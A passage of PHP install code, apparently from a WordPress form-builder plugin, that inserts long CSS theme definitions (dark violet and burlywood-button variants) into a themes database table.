100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #00A25B ), color-stop(39%, #00A15A ), color-stop(100%, #00A15B )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00A25B 0%, #00A15A  39%, #00A15B 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00A25B 0%, #00A15A 39%, #00A15B 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 07 dark violet\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #33016B;\r\nmargin-bottom: 10px;\r\ncolor: #33016B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #33016B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #33016B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #33016B;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #33016B;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #33016B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #33016B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #33016A ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #33016B ), color-stop(39%, #320169 ), color-stop(100%, #33016A )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #33016B 0%, #320169 39%, #33016A 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 07 transparent (burlywood button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #E6C18B;\r\nmargin-bottom: 10px;\r\ncolor: #E6C18B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #E6C18B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: 